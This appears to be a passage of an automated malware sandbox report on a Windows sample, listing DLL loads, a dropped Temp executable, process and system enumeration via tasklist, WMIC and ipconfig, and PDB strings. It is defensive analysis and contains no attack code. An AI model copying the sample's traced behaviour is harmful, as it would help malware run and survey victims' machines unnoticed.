                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic file information: File size 8240610 > 1048576
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Data.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb8* source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                Source: Binary string: System.Drawing.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER40B.tmp.dmp.29.dr
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bound.PDB] source: bound.exe, 00000011.00000002.1610583580.00000254CF206000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499519391.00007FF8F8301000.00000040.00000001.01000000.00000006.sdmp
                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499164616.00007FF8F0D01000.00000040.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Xml.pdbX`h0a source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: System.Configuration.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdbRSDSC source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Xml.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdb source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp, WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500164884.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Data.pdbH source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb source: WER40B.tmp.dmp.29.dr
